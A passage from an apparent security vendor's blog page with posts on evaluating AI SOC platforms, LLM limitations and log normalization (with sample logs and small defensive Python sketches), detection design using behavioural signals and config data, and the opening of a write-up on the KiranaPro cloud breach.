Exaforce changes that by embedding triage into an agentic SOC platform. It automates enrichment, prioritization, and contextualization while preserving shared insights across teams and tools. This alleviates the back pressure of high false positives by triaging them automatically, and automates enrichment across tools and platforms with the knowledge of the most skilled analyst, reducing the burden on understaffed teams and improving downstream and upstream processes. Instead of treating triage as an isolated step, Exaforce makes it the foundation of a continuous, AI-driven workflow, one where context flows naturally, feedback loops stay intact, and analysts are empowered to act faster and smarter. Because triage alone doesn’t make an AI SOC, but the right platform with the right transformational process can.

July 16, 2025

Evaluate your AI SOC initiative

A maturity mapped question framework to benchmark AI SOC platforms on detection, triage, investigation, response, and service quality.

Selecting the right AI-powered Security Operations Center (SOC) solution is no longer just about comparing feature lists. It’s about determining whether a platform (and the team behind it) can truly elevate your organization’s security capabilities, streamline analyst workflows, and adapt alongside an ever-evolving threat landscape. The following question set is designed as a comprehensive evaluation guide, helping you probe the technical depth, operational maturity, and business alignment of any AI SOC initiative you’re considering.

Every vendor is presenting their own “ultimate guide” to evaluating AI SOC solutions. We recognize this can make it difficult to cut through the noise. That’s why we’ve worked hard to make this guide as unbiased and universally useful as possible, grounded in real operational needs, no matter which platform you’re considering.

Use the questions in this guide to reveal how different solutions deliver on detection accuracy, automation, and managed-service quality. Whether you’re building a SOC from scratch, tuning a mature program, or vetting an MDR partner, this framework exposes strengths and gaps that matter to your risk profile. Let your current maturity level set the bar: the table below maps that maturity to how you should use the questions in each section across every phase of the SOC lifecycle.

Detection

  • Can the AI SOC tool generate its own, accurate detections that stand alone or augment ingested SIEM findings?
  • Does the platform allow you to create custom detections? 
  • Does the system triage its detections with context specific to your environment to increase the fidelity of detections?
  • Can the system create detections from the investigations you are performing?
  • Can the system extract Indicators of Compromise (IOCs) and create detections from reading about known exploits?
  • Does the platform require extensive customization and tuning, or can it automatically learn and adapt to my organization’s unique environment, behavior patterns, and business context?
  • Does the platform provide end-to-end coverage across Tier 1 to Tier 3 analyst workflows to minimize handoff issues and preserve investigation context throughout the incident lifecycle?

Triaging

  • How does the platform incorporate business-specific context (e.g., asset criticality, user behavior, environment) to assign severity, prioritize alerts, and reduce false positives?
  • How does the platform automate triage, alert routing, and response based on severity and context?
  • Can the system include user feedback, if applicable, when triaging an issue?
  • Does the system learn from past triaged alerts to improve future outcomes? If so, what information from past analyses does it factor in?
  • Can I clearly see the rationale behind AI-driven decisions and access a full audit trail of actions, such as marking a finding as a false positive, for accountability and review?
  • Does the platform map its detections to the MITRE ATT&CK framework, and how is this presented to accelerate understanding and response?
  • Does the platform support conversational interaction during and after triage, allowing analysts to ask follow-up questions and retrieve insights in natural language?
  • Can the system correlate multiple alerts across other data sources as part of the triage process to determine a wider-scale impact?
  • What is the Mean Time to Investigate (MTTI) for the agent? Consider MTTI as the time interval between alert ingestion and a recommendation or disposition from the system on the alert.

Investigation

  • Does the system perform out-of-the-box parsing, normalization, deduplication, and enrichment of data, making it easier for analysts to understand, navigate, and investigate alerts effectively?
  • Does the platform provide meaningful context and explanations that go beyond what a typical analyst would already know, such as connected identities, chronologically close events across systems, threat intelligence enrichment on IPs, effectively educating users about alerts, tools, and behaviors involved?
  • Does the platform apply advanced analysis techniques such as baselining, identity resolution, and risk scoring to help prioritize alerts and surface meaningful patterns across users, assets, and behaviors?
  • To what extent can analysts complete investigations within the platform, and how often do they need to pivot to external tools or data sources?
  • Does the platform provide clear, contextual summaries of alerts and events, including rationale, risk level, and enriched indicators, to aid investigations and educate analysts beyond standard details?
  • Does the platform allow for seamless investigative pivots from an initial finding, enabling deeper exploration through follow-up questions and queries?
  • Does the platform support flexible investigative workflows, including hypothesis-driven threat hunting and insider threat analysis?
  • Does the platform support real-time collaboration between analysts and AI agents, including shared workspaces, notes, and timelines to document investigations and findings?

Response

  • Can the platform trigger automated, no-code response workflows, like resetting MFA or disabling sessions, based on alert severity and business context?
  • Does the system require building static playbooks, or can you describe to the system, in a prompt, what actions need to be performed under what circumstances?
  • Does the solution support human-in-the-loop decision-making, with flexible business rules that determine when to involve users, managers, or analysts in response?
  • Can the platform prioritize and execute response actions based on contextual risk scores, taking into account user identity, asset exposure, and behavioral anomalies?
  • Does the platform provide a real-time, multi-user Command Center to coordinate response efforts across SOC, IT, and other teams, with full timeline, notes, and next steps?
  • Does the system integrate with existing SOAR technology to leverage existing response workflows?

Services (if choosing an MDR service)

  • How does your provider integrate with your data sources? Is it an API-based integration?
  • Does your MDR require you to have a SIEM for log aggregation and auditability?
  • What is the time to value, from onboarding to when the MDR provider demonstrably understands your environment and provides high-fidelity escalations?
  • Do I have 24/7 access to the underlying platform for visibility, investigation, and collaboration, even outside of MDR interactions?
  • What integrations does the MDR provider have with existing SOC tooling: SIEM, SOAR?
  • Does the provider offer true 24/7 managed detection and response (MDR) services, including continuous monitoring, triage, and escalation?
  • Does the team include security experts with deep experience across IaaS, SaaS, and modern infrastructure environments?
  • What is the expected responsiveness of the MDR or support team for questions, escalations, or incident handling, and is this backed by SLAs?
  • Are regular check-ins or service reviews part of the engagement to ensure alignment, improvement, and evolving threat coverage?

Architecture and Deployment

  • Is the solution offered as a SaaS deployment model to simplify operations and ensure predictable costs?
  • Does the platform support single tenancy, the ability to deploy in your cloud, and data sovereignty to ensure data isolation, meet compliance requirements, and maintain control over where data is stored and processed?
  • Does the platform support multi-level organizational hierarchies and granular role-based access control (RBAC) to effectively manage MSP environments and complex enterprise structures with multiple business units?
  • Does the platform meet your required compliance standards, such as SOC 2, ISO 27001, GDPR, or HIPAA, and can it provide documentation or certifications to verify compliance?
  • If I share data with the platform, is that data used to train underlying models, and what safeguards are in place to prevent unintended exposure or misuse?
  • What mechanisms and safeguards are in place to ensure the platform consistently delivers deterministic and accurate results?
  • How effectively does the platform present key operational metrics, such as MTTI, MTTR, and MTTC, in a clear and actionable way for tracking SOC performance?
  • What is the typical time from onboarding to when the platform begins generating reliable, actionable alerts, including any necessary learning or tuning period?

Onboarding and setup

  • Does the platform offer API-based integrations into your data sources?
  • Can the platform ingest and process data at the volume and velocity required to match the scale of your environment, especially your IaaS and SaaS logs, without performance degradation?
  • Does the platform offer native integrations with key security and IT systems, beyond just SIEMs, including identity providers, IaaS, SaaS, endpoint, email, SASE, and threat intelligence feeds, to provide unified visibility and context?
  • How long does it take the system to establish baselines on known good behavior in the environment?
  • What kind of support services are offered, and do they include experienced personnel and clearly defined SLAs to ensure timely and effective assistance?
  • How involved and collaborative is the team during onboarding? Do they actively guide setup, data source integration, and platform tuning?

Finding the right AI platform for your SOC

Choosing an AI-driven SOC platform is a strategic decision that will shape your security operations. Armed with the questions in this guide, you can cut through buzzwords, validate real-world capabilities, and hold platforms accountable for measurable outcomes, whether it’s reduced MTTR, lower false-positive rates, or demonstrable cost savings. As you compare responses, look for consistency between the platform’s stated features, the support team’s processes, and evidence from proofs of concept.

Ultimately, the right partner will meet your technical requirements today while demonstrating a clear roadmap for tomorrow’s threats and architectures. Prioritize solutions that combine strong native detection with transparent AI reasoning, seamless analyst workflows, and, if you need it, collaborative MDR expertise. When those elements align with your business goals and risk profile, you’ll have the confidence that your SOC is ready not just to keep pace with attackers, but to stay a step ahead.

July 10, 2025

One LLM does not an AI SOC make

LLMs have the potential to improve SOC processes, but they’re not enough on their own. This blog explores why AI SOCs need pre-processing and a new design to add value.

Contributed by: Andrew Green, Enterprise IT Research Analyst

Even though LLMs have the potential to finally solve the decades-old challenges in the SOC, their ability to generate statistically likely strings of text is only a small component of what would constitute an AI SOC. Being new, cool, and delivering on the AI mandate from the C-suites, LLMs have taken the limelight in the AI SOC. 

First, let us remember where LLMs shine:

  1. Their inference process mimics human-like reasoning in a text-based format, which can stand in for a human analyst's actions.
  2. They summarize large amounts of hard-to-read data and translate it into human-understandable insights.

Both capabilities listed above are subject to the data being formatted in an LLM-friendly way, which is what we will address in this blog.

Why is the SOC a ripe area for automation using LLMs?

Unsurprisingly, these capabilities address the exact challenges for the current technology stack used in the SOC. Namely, analysts working with multiple tools to analyze multiple sources of data in order to manually investigate and respond to incidents. 

This is how we got the most quoted problems in the SOC - alert overload, consolidation of tools, and staff shortages. Tools such as SOAR have attempted to address issues around alert overload and staff shortages using deterministic automation. However, scripts and workflows are exclusively useful for the use cases they were designed for. LLM-based automation, however, is suitable for investigation and response without needing to pre-define logic.

For tool consolidation, efforts typically center on deploying security operations platforms, usually from SIEM providers that have acquired or natively developed UEBA, XDR, or SOAR. These are very high-effort, high-cost exercises that are often prohibitive for most organizations. LLMs, with their natural language interface capabilities, can act as an overlay across disparate tools.

To leverage these LLM capabilities, it’s not enough to have a ChatGPT-like experience, i.e., use just one LLM to take in logs via a prompt submitted by an analyst. LLMs need to be architected as agents. The difference between an LLM and an agent comes down to the services wrapped around the LLM, which include memory, RAG, reasoning and chain-of-thought, output parsing, and the like. Agents are then architected into multi-agent systems, which consist of one master agent or orchestrator responsible for coordination, and multiple purpose-built agents such as endpoint response agents, cloud log interpretation agents, and evaluation agents that assess the validity of outputs from other agents. With this architecture, LLM agents are well-suited to address the complexity, scale, and repetitive nature of SOC workflows.
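
A skeletal version of that multi-agent shape, with the LLM calls stubbed out, might look like the following sketch; agent names and routing logic are purely illustrative.

from dataclasses import dataclass

@dataclass
class Finding:
    source: str   # e.g. "cloudtrail", "edr"
    summary: str

class CloudLogAgent:
    def run(self, finding: Finding) -> str:
        # In a real system this would prompt an LLM with normalized
        # cloud logs plus retrieved context (RAG, memory, schemas).
        return f"cloud analysis of: {finding.summary}"

class EndpointAgent:
    def run(self, finding: Finding) -> str:
        return f"endpoint analysis of: {finding.summary}"

class EvaluationAgent:
    """Assesses the validity of other agents' outputs before they ship."""
    def accept(self, analysis: str) -> bool:
        return "analysis of" in analysis  # stand-in for an LLM judge

class Orchestrator:
    """Master agent: routes findings to specialists and checks results."""
    def __init__(self) -> None:
        self.routes = {"cloudtrail": CloudLogAgent(), "edr": EndpointAgent()}
        self.judge = EvaluationAgent()

    def handle(self, finding: Finding) -> str:
        analysis = self.routes[finding.source].run(finding)
        if not self.judge.accept(analysis):
            raise RuntimeError("evaluation agent rejected the analysis")
        return analysis

print(Orchestrator().handle(Finding("cloudtrail", "role assumed from new ASN")))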

Limitations of using LLMs in the SOC

However promising LLMs are for solving some of the SOC’s most pressing challenges, they are not without limitations, which include the following: 

  • Context degradation and forgetting - LLMs have finite context windows. As conversations grow longer or when processing large datasets, older information gets pushed out of the model's active memory. In the SOC, investigations can involve analyzing weeks or months of logs; in those instances the LLM may "forget" earlier findings or context that is essential for accurate results.
  • Multi-agent handoff loss of resolution - In multi-agent architectures, handoffs between agents represent a point of failure. Critical context, nuances, or intermediate findings may get filtered out or summarized away as data moves through the agent chain.
  • Model drift - The longer the output, the more likely it is to drift. As LLMs generate extended responses or analysis, they tend to gradually deviate from the original query or lose focus on the specific security context. This is particularly an issue with chatty LLMs which provide verbose answers. 
  • Time-series analysis - While LLMs excel at pattern recognition in text, they are not designed to handle numerical values and calculations. SOC work heavily relies on detecting statistical outliers or identifying subtle changes in user behavior over time. These tasks are better suited to specialized statistical models or machine learning algorithms, whose findings can then be fed into the AI agents.
  • Hallucinations - LLMs only produce the most likely string of text based on a prompt and context. There is no truth value associated with the prediction, which means that it can produce a likely but factually incorrect string. One hallucination can be carried over in the following responses. 

You may think that the above are limitations of LLMs altogether, but these are particularly important for SOC use cases, not just because of the sensitive nature and low tolerance for faults, but due to the security stack itself. Take IAM log sources for example, which may include Entra ID, Google Workspace, or Okta.

Entra ID

{
  "time": "2025-01-15T14:30:25.123Z",
  "operationName": "Sign-in activity",
  "category": "SignInLogs",
  "resultType": "Success",
  "userPrincipalName": "john.doe@company.com",
  "ipAddress": "203.0.113.100",
  "location": "New York, US"
}

Google Workspace

{
  "id": {"time": "2025-01-15T14:45:30.456Z", "uniqueQualifier": "abc123"},
  "actor": {"email": "jane.smith@company.com"},
  "events": [{"name": "login", "type": "login"}],
  "ipAddress": "198.51.100.25"
}

Okta

{
  "uuid": "def456-ghi789-jkl012",
  "published": "2025-01-15T15:00:45.789Z",
  "eventType": "user.session.start",
  "actor": {"alternateId": "bob.wilson@company.com"},
  "client": {"ipAddress": "192.0.2.50"},
  "outcome": {"result": "SUCCESS"}
}

Looking at the syntax of each log, it’s easy to see how the same event type has different fields and field names across log sources. Interpreting this information requires a human, let alone an AI, to understand the nuances of these events for each source; without that understanding, information can be interpreted incorrectly, leading to incorrect analysis. Without normalization and canonicalization, it becomes difficult to extract consistent value for understanding threats and providing insights for investigations.

Pre-LLM data processing and analysis

We can give LLMs the best chance of producing accurate outputs through a smart end-to-end pipeline, from data ingest to the multi-agent architectures and post-LLM validation and evaluation.

The pre-LLM data processing layer is perhaps the most important one for circumventing the limitations listed above, particularly around hallucinations. This pre-LLM layer is often referred to as the semantic layer, which is responsible for transforming raw data into LLM-friendly formats. By LLM-friendly formats, we refer to consistent and explicit schemas across all sources. 

This is commonly done through normalization, deduplication, sanitization, and conversion of data, which makes, for example, Entra ID, Google Workspace, and Okta logs read the same. An alternative is to define explicit schema definitions for each data source that tell the LLM how the source is formatted and how to interpret it.
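
As a minimal sketch of that normalization step, the three sign-in events above can be mapped onto one canonical schema before anything reaches an LLM. The canonical field names here are our own invention for illustration.

from typing import Any

def normalize_signin(source: str, event: dict[str, Any]) -> dict[str, str]:
    """Map vendor-specific sign-in logs onto one canonical schema.

    The target fields (actor, ip, time, outcome) are illustrative; the
    point is that every source fills the same keys.
    """
    if source == "entra_id":
        return {"actor": event["userPrincipalName"],
                "ip": event["ipAddress"],
                "time": event["time"],
                "outcome": event["resultType"].lower()}
    if source == "google_workspace":
        return {"actor": event["actor"]["email"],
                "ip": event["ipAddress"],
                "time": event["id"]["time"],
                # outcome is not present in this sample; assumed success
                "outcome": "success"}
    if source == "okta":
        return {"actor": event["actor"]["alternateId"],
                "ip": event["client"]["ipAddress"],
                "time": event["published"],
                "outcome": event["outcome"]["result"].lower()}
    raise ValueError(f"unknown source: {source}")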

Like the time-series analysis mentioned above, behavioral analysis is not in the LLM’s wheelhouse, but it is a great candidate for the pre-LLM semantic layer. Established techniques such as statistical analysis are often adopted in solutions like UEBA, but the output is either another alert or a simple deterministic automation script. In the AI SOC, these outputs can instead be forwarded to an agent for further investigation, interpretation, and validation.
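
For instance, a simple baseline such as the z-score check below can flag a numeric outlier deterministically, handing the agent a compact signal rather than the raw series; the threshold and field names are illustrative assumptions.

import statistics

def zscore_signal(history: list[float], today: float,
                  threshold: float = 3.0) -> dict | None:
    """Flag today's value if it sits far outside the historical baseline.

    Returns a compact, LLM-friendly signal dict instead of raw numbers,
    or None when the value is unremarkable.
    """
    mean = statistics.mean(history)
    stdev = statistics.stdev(history)
    if stdev == 0:
        return None
    z = (today - mean) / stdev
    if abs(z) < threshold:
        return None
    return {"signal": "volume_anomaly", "zscore": round(z, 1),
            "baseline_mean": round(mean, 1), "observed": today}

# Ten days of roughly five daily logins, then a burst of forty.
print(zscore_signal([5, 6, 4, 5, 5, 7, 4, 6, 5, 5], 40.0))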

The AI SOC must extend beyond the LLM

We’ve seen the inherent limitations of LLMs and why they cannot be the only component in an AI SOC. Yes, they can perform sophisticated investigations at the level of human analysts in a fraction of the time, but they can only do so accurately if they are fed the right type of data in the right format, and if their output is evaluated and validated.

As such, the data must be made not just machine-readable but human-interpretable. After all, LLMs are optimized to predict what a human would likely say next, not to establish truth from bits. The layer responsible for normalizing, deduplicating, enriching, and shaping logs into consistent semantic structures is not optional. It’s foundational. 

This semantic layer, which renders fragmented, multi-source security data into a format that’s both logical and legible, gives LLMs the grounding they need to operate effectively and truly provide value in the SOC.

June 24, 2025

Detections done right: Threat detections require more than just rules and anomaly detection

Discover how Exaforce fuses logs, config & identity into an AI-powered graph that improves on legacy and naive detection techniques.

What does it take to do detections right, and why have we gotten it wrong for so long?

Detections were originally built using rules in real time on log data. In the mid-2010s, User and Entity Behavior Analytics (UEBA) products introduced sophisticated baselining and grouping techniques to identify outliers, focusing primarily on users and, occasionally, resources. For many mature SOC teams, these components of rules and anomalies are still the pillars of their detection architecture.

However, this approach leaves three critical gaps: 

  1. It cannot correlate findings with configuration (config) data
  2. It fails to account for unique cloud semantics
  3. It leaves context evaluation to a manual post-detection phase, which results in noisy individual detections instead of full incidents.

Incorporating configuration information

One element that both legacy approaches lack is the ability to correlate event data and historical data with config data. This piece of the puzzle is critical to avoiding excessive false positives and to properly assessing the impact of an alert. Today, most teams incorporate this data only post-detection, during the triage and analysis phase, and often the information has to be retrieved manually and is difficult to parse. Moving the config analysis into the detection logic itself makes detections more accurate and helps teams operate more efficiently, as the sketch after this list illustrates. This config data can include:

  • Blast radius assessment: This user may be compromised, but what resources can they access? This is not easy. In some environments, such as AWS, assessing this requires a full chain of identity analysis: which roles can assume which other roles, and which resources each of those can access. Without this full analysis, there can be false positives about the identity's true access.
  • Proper severity assessment: This EC2 instance is acting anomalously, and its attached instance profile has admin permissions, which may be extra risky.
  • False positive recognition: Using effective permission analysis, we can tell that this user was suddenly granted a very permissive role, but the sensitive assets have resource policies that override the role granted, so it’s actually benign and shouldn’t create an alert.
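
Here is a simplified sketch of the third bullet, effective-permission analysis; all structures are hypothetical. The detection consults config before firing, so an alarming role grant is downgraded when resource policies deny the sensitive access anyway.

def effective_access(role_actions: set[str],
                     resource_policy_denies: set[str]) -> set[str]:
    """Permissions the identity can actually exercise on the resource.

    Resource policies override the granted role, so a permissive role
    grant may still yield no sensitive access in practice.
    """
    return role_actions - resource_policy_denies

def should_alert(new_role_actions: set[str],
                 sensitive_actions: set[str],
                 resource_policy_denies: set[str]) -> bool:
    """Fire only if the grant actually exposes sensitive actions."""
    usable = effective_access(new_role_actions, resource_policy_denies)
    return bool(usable & sensitive_actions)

# A scary-looking grant that resource policies neutralize: no alert.
print(should_alert(
    new_role_actions={"s3:GetObject", "s3:DeleteObject"},
    sensitive_actions={"s3:DeleteObject"},
    resource_policy_denies={"s3:DeleteObject"},
))  # False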

Attempts to incorporate config data into detections themselves have been made. Many products offer features such as user or entity frameworks, tags, and HR integrations to try and bring aspects of this data into the detection fold. However, maintaining those integrations and updates, and covering the breadth of config data in the model, is extremely time-consuming and difficult, and as such, many teams have resorted to moving the config analysis to the post-detection phase.

Built for cloud & SaaS

UEBA has its origins in the insider threat use case. It was primarily built for identities and modeling their typical activities/patterns. As the approach proved fruitful, many expanded to model some resources as well, often individual virtual machines (VMs) or instances. However, with the shift to IaaS and SaaS environments that many are embarking on, the notion of UEBA needs a major reset. Cloud resources are often ephemeral, leading to different scaling requirements and a new approach to baselining and anomaly detection. The variety of IaaS and SaaS resources - from Kubernetes workloads and pods, GitHub repositories and actions, to Google documents - all require very different modeling. Even the traditional identity is not as straightforward. Roles in AWS, for example, may be assumed by a mix of humans and machines, making their modeling far more complex. In some AWS cases, the alert may not even be attributable to an origin identity, only to the role used. As a result, the traditional UEBA tools and features often fall short of the needs of modern organizations that operate in cloud and multicloud environments. 

Detections are not incidents

The job of the detection tool is not just to provide a hint of suspicious activity but also to ensure that the alert is framed in the full context of the environment. Examples include auto-grouping duplicate alerts and incorporating business context during events such as reorganizations, mergers, or new tool rollouts. The ability for the detection tool to accommodate such context is critical to ensuring analyst expediency and completeness of investigation, as it greatly reduces the noisy individual detections and transforms them into well-documented incidents. Very pointed tools often put a burden on a Security Information and Event Management (SIEM), Security Orchestration, Automation, and Response (SOAR), or other system to do a second level of correlation, aggregation, and analysis to perform some of these steps, making maintenance of this system cumbersome and manual.

At Exaforce, effective detection is a well-balanced triad of rules, anomalies, and config data purpose-built for the modern cloud and SaaS centric company. Here's how our approach breaks from tradition and why that matters. 

In the next few sections, we’ll explore how Exaforce overcomes these limitations in current solutions with a fresh, AI-powered approach to data ingestion and modeling. By fusing log, config, and identity data into a unified semantic layer, and then layering behavioral baselines and knowledge-driven reasoning on top, Exaforce converts scattered signals into precise, high-fidelity alerts that reveal complete attack chains rather than isolated anomalies.

The Semantic Data Model

Ensuring quality data

Our approach to detection begins with Exaforce’s three-model architecture: the Semantic Data, Behavioral, and Knowledge models. Each adds a distinct layer of context.

We ingest event and config data from various sources and convert them into structured Events and Resources. Events are organized into Sessions to add perspective and contextual signals such as location, Autonomous System Numbers (ASN), and duration at a session level. We also chain sessions to capture origin identities, role assumptions, cross-role behavior, and action sequences that enable more complete analysis of what was done and by whom. This preps the data for the detection assessments to come. 
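
A bare-bones version of gap-based sessionization looks like the following sketch; the 30-minute idle timeout and event shape are assumptions, and our pipeline adds chaining and enrichment on top.

from datetime import datetime, timedelta

IDLE_TIMEOUT = timedelta(minutes=30)  # assumed session boundary

def sessionize(events: list[dict]) -> list[list[dict]]:
    """Group one identity's events into sessions split on idle gaps.

    Events must be pre-sorted by timestamp and carry an ISO-8601 'time'
    field. Session-level signals (location, ASN, duration) can then be
    computed over each group rather than over isolated events.
    """
    sessions: list[list[dict]] = []
    last_ts: datetime | None = None
    for event in events:
        ts = datetime.fromisoformat(event["time"])
        if last_ts is None or ts - last_ts > IDLE_TIMEOUT:
            sessions.append([])          # idle gap: start a new session
        sessions[-1].append(event)
        last_ts = ts
    return sessions

events = [{"time": "2025-01-15T14:00:00", "action": "ConsoleLogin"},
          {"time": "2025-01-15T14:05:00", "action": "AssumeRole"},
          {"time": "2025-01-15T17:00:00", "action": "GetSecretValue"}]
print(len(sessionize(events)))  # 2: the three-hour gap splits the sessions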

Resources undergo similar treatment. We capture config, parse resource types, enrich the resources, and build relationship graphs. Exaforce also collects config changes over time, enabling us to detect subtle but critical changes that would otherwise go unnoticed. It also empowers us to assess the impact of each config change, effectively conducting a full blast radius analysis. Identities, a key subset of resources, receive extra enrichment, for example:

  • Human vs. machine classification: Exaforce’s model analyzes identity types, behavior patterns, and role assumption patterns to classify identities as humans or machines. This classification is dynamic to allow for complex scenarios (e.g., cases in which a new identity is created by a human but then used in a script executed by a machine identity, or roles which are shared by both human and machine identities). As an identity’s human vs machine classification changes, so will the way they are enriched and modeled. 
  • Effective permission analysis: Interpret the full range of permissions the user has based on transitive role assumption capabilities and overlay them with resource policy information. 
    • Identity chaining: Which identity actually performed this action, not just which role was used
    • Reachable resource analysis: which resources can this identity access, with what actions, and access level
  • 3rd-party identities/access: Identify third-party identities and monitor their behavior and privileges more carefully. 

Resources in our context are a generic construct. They could be anything from AWS EC2 instances, Kubernetes Jobs, GitHub repositories, to Okta roles. This modeling of the config from the outset allows for a more complete detection to be formed and provides the foundation for the first pillar: configuration.

The Behavioral Model

In Exaforce, any dimension that could be anomalous is referred to as a Signal, for example, an unusual location or rare service usage. Signals may be weak or strong, but both are important. Detections are generated by grouping signals that occur in the same event or session, representing collections of medium-fidelity anomalies. These signals and detections provide the rule and anomaly pillars of the solution.

The Semantic Model sets the data up to be modeled in the Behavioral Model. Sessionizing events, for example, allows us to go beyond baseline individual actions to baseline combinations of events and event patterns. Similarly, baselines are customized to the object in question; for example, humans and machines (identified in the aforementioned Semantic Data Model) are modeled differently. Machines tend to follow predictable patterns, while humans are far more eclectic. Shared identities, such as a role used by both an engineer and automation scripts, are modeled with this nuance in mind. 

We model a wide range of signals, independently and in combination, including:

  • Action (and action patterns)
  • Service
  • Time 
  • Duration
  • Location and ASN (including cross-source comparisons)
  • Resource

Here’s an example of an Exaforce finding with multiple signals. In this example, we saw both an Operation Anomaly and a Service Usage anomaly. This user, Mallam, does not usually perform this GetSecretValue action, and they do not typically perform actions in the AWS US East 2 region. This led Exaforce to fire a detection. 

A contextualized threat finding bringing together an action with past behavior.
Additional event data and signals brought together into a unified finding.

This multidimensional approach is critical: a single weak signal is rarely enough, but several weak signals, together, often are. This rule-and-anomaly detection approach, across the breadth of supported resources and log sources, represents two pillars in the detection trio.
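
One way to picture the "several weak signals together" idea is an additive score; the weights and threshold below are invented for illustration, and our actual models are far richer than a weighted sum.

# Per-signal weights: each signal alone is too weak to alert on.
SIGNAL_WEIGHTS = {
    "new_location": 0.3,
    "new_asn": 0.3,
    "rare_operation": 0.4,
    "rare_service": 0.3,
}
DETECTION_THRESHOLD = 0.6  # assumed cut-off for firing a detection

def score_session(signals: set[str]) -> float:
    """Sum the weights of the anomaly signals seen in one session."""
    return sum(SIGNAL_WEIGHTS.get(s, 0.0) for s in signals)

# A rare GetSecretValue alone stays quiet...
print(score_session({"rare_operation"}))                     # 0.4
# ...but combined with an unusual service/region it crosses the bar.
print(score_session({"rare_operation", "rare_service"}) >= DETECTION_THRESHOLD)  # True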

The Knowledge Model

The goal of detections is completeness to make sure no signal of potential compromise is overlooked. But completeness can result in noise. That’s where our Knowledge Model comes in. 

After the Semantic Data Model runs and signals fire and are grouped into detections, Exaforce runs a triage pipeline that contextualizes each detection and adds organization-specific business context, turning medium-fidelity detections into high-fidelity findings. This triage process is performed on Exaforce and third-party alerts alike and augments context even further to ensure we only surface alerts worthy of analyst attention. The analysis includes weighing conflicting factors in context and occurs at the end of the detection stage. For example, it could weigh the fact that the user has broad privileges against the severity of the action taken.

The weighing of resource/identity config data with rule and anomaly outputs happens in this knowledge model and is supplemented by the additional context around similar findings, business context provided by the user, user/manager validation responses, etc. 

  • Similar Findings are identified. If closed, their resolutions are used as inputs to the model to assess this finding. If they are still open or in progress, the model will group them. Once grouped, the findings will be classified as duplicate, grouped, or chained to specify the relationship and level of related analysis. 
  • Business context rules give users a mechanism to input free-form data into the model. This could include context about the environment (e.g., these resources are very important, or we use this VPN), information about users (e.g., users A, B, and C are all part of the Executive Team and should be monitored carefully), or general context about the company (e.g., we are a health company with offices in the following locations, and often have teams commuting between these sites). This free-form input allows novice users to influence and inform the Exabots about critical context without manually having to silence or suppress individual alerts.
  • Exabots also have skills that allow them to seek validation from end users. If the Exabot determines that a user validation or manager validation would be helpful, it can trigger a Slack/Teams message to the individual and use their response as an influence on the determination.  

The Exabots curate this set of information and pass it to the Knowledge Model agents to assess each of these factors and make a determination of “False Positive” or “Needs Investigation,” turning basic Detections into context-rich Incidents. All of these analyses are run continuously while the alert is open or in progress, so even as your environment changes, your recommended assessments stay up to date. Note that the preparation, structuring, and condensing of this data helps ensure that the AI agents performing the analysis are the most accurate and minimizes hallucinations. 

Running the initial knowledge model before presenting the detection to the user allows the Exaforce detections to be extremely high fidelity.

Example

The user here was seen in two locations, Zurich and Matran, in quick succession. This quick mid-session location switch was anomalous, but the locations themselves were consistent with the user's previous behavior and with other company employees as well. The actions performed were also consistent with historical behavior for this user. The triage agent was therefore able to weigh the anomalous signal against the other factors and rule this a false positive. You'll note that the triage agent is also armed with company-specific business context; in this example, it refers to an office in Zurich. (More about business context and triage in our next blog!)

An automatically marked false positive of a user accessing a repository from multiple locations based on business context.

After triage, we group findings, both Exaforce and third-party, into aggregated attack chains. This lets analysts see the full picture, not just disconnected events.

Exaforce in action: GitHub example

Let’s see the Exaforce approach in practice.

GitHub is a critical data source. It contains sensitive data such as company intellectual property and can even have attached secrets that are highly permissive to perform CI/CD actions. However, it’s often overlooked.

Exaforce ingests logs and config data to gather activity information and identify risks and threats associated with supply chain attacks. Consider, for example, Personal Access Tokens (PATs), the credentials commonly used in CI/CD and developer workflows. Out of the box, GitHub logs provide hashed PATs and basic attribution. Exaforce goes further. In this example, the Semantic Data Model:

  • Ingests log and config data, and sessionizes it to understand resources such as the repositories, workloads, actions, tokens, etc. 
  • Enriches the token resource with scope information for the token from the config data to understand access and permissions. This involves correlating the token’s scope information from the config information with runtime data containing the hashed token in the logs. 
  • Classifies tokens used for cron jobs, ad-hoc scripts, and user-driven actions based on their historical usage.

Instead of simply attributing actions to a user, the behavioral model then also builds tailored baselines for the tokens themselves and generates signals for any anomalies found. PAT-based baselines allow for a variety of unique detections and protections. Users may have multiple PATs in use simultaneously for a mix of automation and ad hoc usage. Distinct baselines per PAT allow us to avoid firing false-positive detections when several are in use concurrently.

Here, we identified 6 types of anomalies (signals), most critically, a new repository being accessed from a new ASN.

A threat identified with a user making code changes with multiple locations and ASNs, contextualized with configuration data (lacking branch protection rules).

The Knowledge Model weighed these anomalies against the PAT’s scopes to determine alert severity.

Multiple event signals correlated with configuration data culminating in a single alert with a dynamic severity.

The traditional detection pillars were powerful in finding things but lacked context, creating noisy alerts without enough detail to paint a full picture. Exaforce delivers high-fidelity findings by starting with strong foundations: a semantic data model that structures raw IaaS and SaaS data into enriched, contextual entities.

We monitor a wide range of signals across actions, identities, sessions, and more to detect even minor deviations that add up to real alerts. Our bespoke modeling ensures deep coverage across both IaaS and SaaS environments, including overlooked systems like GitHub and Google Workspace.

Signals are aggregated into cohesive, cross-dimensional findings, and our triage agents weigh conflicting anomalies to surface only what truly matters.

The result? Comprehensive coverage, smarter triage, and dramatically fewer false positives.

June 10, 2025

The KiranaPro breach: A wake-up call for cloud threat monitoring

Practical takeaways and best practices in the aftermath of the KiranaPro breach.


The breach at KiranaPro, an Indian grocery delivery startup, underscores a widespread misconception: that cloud-provider controls alone are sufficient. After attackers gained access through a former employee’s account, they deleted KiranaPro’s entire AWS and GitHub infrastructure—wiping out code, data, and operations. The incident highlights a dangerous gap in how organizations monitor SaaS and IaaS environments.

A deeper look at the KiranaPro incident

On May 26, 2025, KiranaPro’s entire cloud infrastructure was wiped out by hackers who exploited credentials from a former employee. Despite the startup’s use of standard security measures, including multi-factor authentication, attackers managed to bypass these safeguards. The damage included deletion of sensitive customer data, operational code, and critical cloud resources. The root issue was not a weakness in AWS or GitHub, but rather gaps in KiranaPro’s own security practices, specifically inadequate user access management and a lack of proactive monitoring for abnormal activity.

Cloud providers aren’t watching your accounts

Many organizations mistakenly believe cloud providers handle comprehensive security. In reality, cloud providers employ a “shared responsibility model”: providers secure the underlying infrastructure, while customers secure their data, accounts, and access policies. KiranaPro’s breach vividly demonstrates the risks organizations face when they misunderstand or neglect their side of this shared responsibility.

